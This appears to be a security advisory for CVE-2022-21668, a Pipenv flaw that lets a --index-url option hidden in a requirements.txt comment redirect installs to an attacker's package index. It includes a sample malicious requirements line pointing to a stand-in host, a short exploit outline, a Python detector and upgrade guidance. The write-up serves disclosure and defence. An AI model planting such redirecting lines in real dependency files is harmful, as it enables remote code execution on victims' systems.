Pipenv, a popular Python development workflow tool, contains a critical security vulnerability that affects versions 2018.10.9 through 2022.1.7. This vulnerability, identified as CVE-2022-21668, allows an attacker to craft a malicious string within a comment in a requirements.txt file. If a victim installs the dependencies in that file using Pipenv, it can lead to remote code execution (RCE) on the victim's system. This vulnerability has been patched in Pipenv version 2022.1.8.

Details

CVE-2022-21668 is a flaw in Pipenv's parsing of requirements.txt files that lets an attacker insert a specially crafted string into a comment within the file. This malicious string can redirect the package installation process to use a package index server controlled by the attacker, allowing them to serve packages containing malicious code.

Example of a malicious requirements.txt file

# This is a comment with a --index-url https://malicious-server.com/simple/ crafted string

django==3.2.9
requests==2.25.1

In this example, the attacker has embedded a --index-url option directing the installation process to their malicious package index server. When the victim installs the dependencies using Pipenv, it will download the packages from the attacker's server. These packages may contain malicious code, which will be executed on the victim's system during installation.

This RCE vulnerability can have severe consequences, allowing an attacker to execute arbitrary code on the target system. It is a serious issue that requires immediate attention and patching.

Here's how the exploit could look:

1. Attacker creates a malicious requirements.txt file with a hidden --index-url option pointing to their malicious package index server.

2. Victim installs the dependencies in the requirements.txt file using Pipenv.

3. Pipenv downloads the packages from the attacker's malicious package index server and installs them on the victim's system.
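As an added illustration (not code from the advisory or the Pipenv project), the following Python check scans a requirements.txt for pip index options hidden inside comments, the pattern described above, and also surfaces genuine option lines that change the package source so they can be reviewed before installation. The sample file content is constructed, and the list of options treated as index-redirecting is an assumption for this example.

```python
import re
from typing import List, Tuple

# Options that change where pip fetches packages from. This list is an
# assumption for the example: it covers the --index-url form from the
# advisory, its short form, and related index/finder options.
INDEX_OPTION_RE = re.compile(
    r"(?:^|\s)(--index-url|-i|--extra-index-url|--find-links|-f|--trusted-host)(?:[=\s]|$)"
)

# Constructed sample: the advisory's pattern on line 1, a harmless trailing
# comment on line 3, and a genuine option line on line 4.
SAMPLE_REQUIREMENTS = """\
# This is a comment with a --index-url https://malicious-server.com/simple/ crafted string
django==3.2.9
requests==2.25.1  # pinned for the 3.2 branch
--extra-index-url https://internal.example/simple
"""


def findings_for_requirements(text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, kind, raw_line) for lines that deserve review.

    kind is "option-in-comment" when an index option appears inside a
    '#' comment (the CVE-2022-21668 pattern), or "index-option" when a
    real option line changes the package source.
    """
    results = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line:
            continue
        # pip treats '#' at the start of a line, or preceded by whitespace,
        # as the beginning of a comment; split the line on that boundary.
        m = re.search(r"(^|\s)#", line)
        code, comment = (line[: m.start()], line[m.end():]) if m else (line, "")
        if comment and INDEX_OPTION_RE.search(comment):
            results.append((lineno, "option-in-comment", raw))
        elif code.startswith("-") and INDEX_OPTION_RE.search(code):
            results.append((lineno, "index-option", raw))
    return results


if __name__ == "__main__":
    for lineno, kind, raw in findings_for_requirements(SAMPLE_REQUIREMENTS):
        print(f"line {lineno}: {kind}: {raw}")
```

Run it against a real requirements.txt before installing; a hit of kind "option-in-comment" is exactly the case an unpatched Pipenv would act on.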

Patching

This vulnerability has been patched in Pipenv version 2022.1.8. To resolve this issue, upgrade to the latest version of Pipenv:

pip install --upgrade pipenv

References

- GitHub Security Advisory: CVE-2022-21668 - The official security advisory on GitHub which contains more information about this vulnerability.
- Pipenv documentation - The official documentation for Pipenv, which provides an overview of the tool and its usage.

Conclusion

CVE-2022-21668 is a significant security issue in Pipenv, affecting versions 2018.10.9 through 2022.1.7. This vulnerability allows an attacker to gain remote code execution on the victim's system by exploiting the flaw in Pipenv's parsing of requirements.txt files. Upgrading to Pipenv 2022.1.8 or later is highly recommended to protect against this vulnerability.

Timeline

Published on: 01/10/2022 21:15:00 UTC
Last modified on: 04/25/2022 17:58:00 UTC